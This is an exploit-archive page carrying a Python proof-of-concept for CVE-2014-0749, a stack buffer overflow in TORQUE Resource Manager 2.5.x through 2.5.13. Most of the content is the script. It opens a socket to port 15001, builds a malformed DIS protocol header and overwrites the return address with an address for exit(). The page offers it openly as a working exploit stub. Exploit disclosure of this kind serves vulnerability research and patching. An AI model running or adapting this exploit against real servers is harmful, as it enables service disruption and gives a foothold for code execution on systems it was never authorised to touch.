what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

TORQUE Resource Manager 2.5.13 Buffer Overflow

TORQUE Resource Manager 2.5.13 Buffer Overflow
Posted May 30, 2014
Authored by bwall

TORQUE Resource Manager versions 2.5.x through 2.5.13 suffer from a stack buffer overflow vulnerability.

tags | exploit, overflow
advisories | CVE-2014-0749
SHA-256 | 01db40756d23f2ac4bcfe60e33e9ff8f16a701a683f0b663f33585f704651449

TORQUE Resource Manager 2.5.13 Buffer Overflow

Change Mirror Download
#!/usr/bin/env python
# Exploit Title: TORQUE Resource Manager 2.5.x-2.5.13 stack based buffer overflow stub
# Date: 27 May 2014
# Exploit Author: bwall - @botnet_hunter
# Vulnerability discovered by: MWR Labs
# CVE: CVE-2014-0749
# Vendor Homepage: http://www.adaptivecomputing.com/
# Software Link: http://www.adaptivecomputing.com/support/download-center/torque-download/
# Version: 2.5.13
# Tested on: Manjaro x64
# Description:
# A buffer overflow while parsing the DIS network communication protocol. It is triggered when requesting that
# a larger amount of data than the small buffer be read. The first digit supplied is the number of digits in the
# data, the next digits are the actual size of the buffer.
#
# This is an exploit stub, meant to be a quick proof of concept. This was built and tested for a 64 bit system
# with ASLR disabled. Since Adaptive Computing does not supply binary distributions, TORQUE will likely be
# compiled on the target system. The result of this exploit is intended to just point RIP at 'exit()'

import socket


ip = "172.16.246.177"
port = 15001

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((ip, port))

offset = 143
header = str(len(str(offset))) + str(offset) + '1'

packet = header
packet += "\x00" * (140 - len(packet))
packet += ('\xc0\x18\x76\xf7\xff\x7f\x00\x00') # exit() may require a different offset in your build

s.sendall(packet)
data = s.recv(1024)
s.close()
Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    63 Files
  • 14
    Nov 14th
    18 Files
  • 15
    Nov 15th
    8 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    18 Files
  • 19
    Nov 19th
    7 Files
  • 20
    Nov 20th
    13 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close